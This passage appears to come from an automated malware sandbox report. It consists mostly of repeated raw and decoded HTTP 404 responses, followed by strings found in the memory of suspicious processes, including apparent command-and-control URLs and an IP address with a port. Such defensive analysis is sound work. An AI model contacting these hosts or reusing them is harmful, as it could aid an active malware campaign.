to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 22 Nov 2024 13:46:06 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 22 Nov 2024 13:46:09 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 22 Nov 2024 13:46:11 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 22 Nov 2024 13:46:14 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 13:46:37 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 13:46:40 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 13:46:43 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 13:46:45 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 13:46:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 13:46:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 13:46:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 13:47:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000003B80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.klohk.tech/3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu
                Source: eLiCpwzRIeWAs.exe, 00000007.00000002.3295460520.00000000052E3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.telforce.one
                Source: eLiCpwzRIeWAs.exe, 00000007.00000002.3295460520.00000000052E3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.telforce.one/ykhz/
                Source: ktmutil.exe, 00000006.00000002.3293451407.00000000037B4000.00000004.10000000.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000003214000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2045258675.0000000025CB4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://34.92.79.175:19817
                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ktmutil.exe, 00000006.00000003.1937688978.000000000765D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
